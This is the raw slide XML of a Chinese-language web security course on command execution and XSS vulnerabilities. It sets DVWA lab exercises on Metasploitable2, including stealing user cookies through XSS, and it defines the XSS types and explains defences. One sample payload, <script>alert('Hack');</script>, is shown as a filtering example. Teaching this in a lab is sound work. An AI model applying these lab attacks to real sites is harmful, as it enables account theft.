                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>级别</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1600" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>命令执行</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>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eaLnBrk="0" hangingPunct="0">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="CC0000"/>
                        </a:buClr>
                        <a:buSzTx/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1600" b="0">
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>medium、high和impossible级别的命令执行漏洞</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>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3" name="表格 2"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>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lang="en-US" sz="1600">
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>6.5 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>命令执行漏洞</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="组合 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="533756" y="1853381"/>
            <a:ext cx="4302496" cy="638783"/>
            <a:chOff x="6627851" y="1754191"/>
            <a:chExt cx="4302496" cy="638783"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId6"/>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6" name="矩形 5"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7"/>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12" name="文本框 570"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId8"/>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571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId9"/>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任务拓展</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>】</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3050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5 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>命令执行漏洞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lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1、对靶机Metasploitable2-Linux的DVWA进行命令执行漏洞的利用。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、填写下表。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="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表格 5"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1873885" y="3375660"/>
          <a:ext cx="7976235" cy="2595245"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2045335"/>
                <a:gridCol w="3272155"/>
                <a:gridCol w="2658745"/>
              </a:tblGrid>
              <a:tr h="332740">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0" algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" b="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>项目名称</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800" b="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>项目节点</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800" b="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>节点参数</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23570">
                <a:tc rowSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0" algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" b="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>命令执行漏洞</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600" b="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>1、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>low级别注入的payload</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="18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1216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p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1600" b="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>2、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>medium级别注入的payload</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="18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677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p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1600" b="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>3、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>high级别注入的payload</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="18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solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2"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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 -2147482483"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="337" t="806"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6223000" y="2412365"/>
            <a:ext cx="4721225" cy="400685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9" name="图片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1192530" y="2382520"/>
            <a:ext cx="4739640" cy="4007485"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="标题 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>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sz="2800" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用AWVS扫描Web系统</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0" name="文本框 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="499110" y="1320165"/>
            <a:ext cx="10925810" cy="1274445"/>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4、出扫描</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>报告</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin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扫描报告</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>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xit" presetSubtype="4" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(down)">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06</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sz="4000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>6.6 XSS</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跨站脚本漏洞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0">
    <p:random/>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34" cy="4347"/>
              <a:chOff x="672" y="3092"/>
              <a:chExt cx="14834"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任务描述</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84" y="6880"/>
                <a:ext cx="1622"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【学习目标】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1681200"/>
            <a:ext cx="10800000" cy="2205990"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>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理解XSS跨站脚本漏洞。</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掌握XSS跨站脚本漏洞的利用。</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了解XSS跨站脚本漏洞的防御措施。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【任务分析】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1684800"/>
            <a:ext cx="10800000" cy="2720340"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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635000" algn="just" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">
                  <wpsdc:indentchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="200" checksum="1170532397"/>
                </a:ext>
              </a:extLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XSS漏洞是网站存在相当多的漏洞，仅次于SQL注入，攻击者可以使用XSS来绕过访问控制，如同源策略，利用XSS可以窃取账号，网页挂马，发动拒绝服务攻击，发送垃圾邮件等等。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" kern="100" dirty="0">
              <a:effectLst/>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="635000" algn="just" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">
                  <wpsdc:indentchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="200" checksum="1170532397"/>
                </a:ext>
              </a:extLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>本任务介绍XSS攻击的基本原理、分析XSS跨站脚本漏洞代码，讲解XSS跨站脚本漏洞的利用方法，介绍防范XSS跨站脚本漏洞的措施。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3500">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="35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00" y="1681200"/>
            <a:ext cx="10800000" cy="4728845"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marR="0" indent="0" algn="just" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">
                  <wpsdc:indentchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="0" checksum="3407529306"/>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一、XSS攻击的基本原理</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XSS，即跨站脚本攻击，是攻击者通过在Web页面中嵌入恶意代码，当用户访问这些页面时，这些嵌入的代码便会被执行，可能导致身份盗窃、钓鱼攻击、恶意代码传播和浏览器控制等后果。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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4915535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marR="0" indent="0" algn="just" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">
                  <wpsdc:indentchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="0" checksum="3407529306"/>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二、XSS</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的三种</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主要类型</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R="0" indent="609600" algn="just" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="11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1、反射型XSS</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当用户访问一个含有恶意代码的URL请求时，服务器接收并处理这个URL请求，随后将响应数据发回浏览器，浏览器在解析响应数据时，恶意代码便被执行。</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1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2、存储型XSS</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攻击者将恶意代码上传或存储在有XSS漏洞的服务器中。当其他用户访问包含这些恶意代码的页面时，恶意代码便被执行。</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1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3、DOM型XSS</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10000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="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这是一种基于文档对象模型（DOM）。攻击者将恶意代码注入到DOM中，当DOM发生</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改变</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时，恶意代码将在用户的浏览器中执行。</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94385" y="1577975"/>
            <a:ext cx="10800080" cy="4815205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" marR="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pP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三</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、XSS攻击的防范措施</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L="0" marR="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAf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1、HttpOnly防止劫取Cookie</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L="0" marR="0" indent="457200" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAf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Cookie中设置了HttpOnly属性，那么通过JavaScript脚本将无法读取到Cookie信息，这样能有效的防止XSS盗取用户Cookie。XSS漏洞的一个很大的危害就是对用户Cookie的截取</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a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400" kern="100" dirty="0">
              <a:effectLst/>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAf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2、输入检查</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L="0" marR="0" indent="457200" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAf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检查用户输入的数据中是否包含一些特殊字符，如“&lt;”、“&gt;”、“'”、“"”、“script”等，如果发现存在特殊字符，则将这些字符过滤或者编码。例如</a:t>
            </a:r>
            <a:r>
              <a:rPr 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&lt;script&gt;alert('Hack');&lt;/script&gt;</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如果过滤“script”或“&lt;”，则XSS语句将无法执行，这就完成了简单的防御XSS的功能。</a:t>
            </a:r>
            <a:endPar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5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="794385" y="1577975"/>
            <a:ext cx="10761980" cy="4728845"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" marR="0" indent="457200" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>我们将利用DVWA平台上的XSS跨站脚本漏洞来获取用户Cookie值。本节的学习任务分为五部分：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:effectLst/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="457200" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>一、low级别的反射型XSS漏洞利用。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:effectLst/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="457200" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>二、分析medium、high和impossible级别的反射型XSS源代码。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:effectLst/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="457200" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>三、low级别的存储型XSS漏洞利用。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:effectLst/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
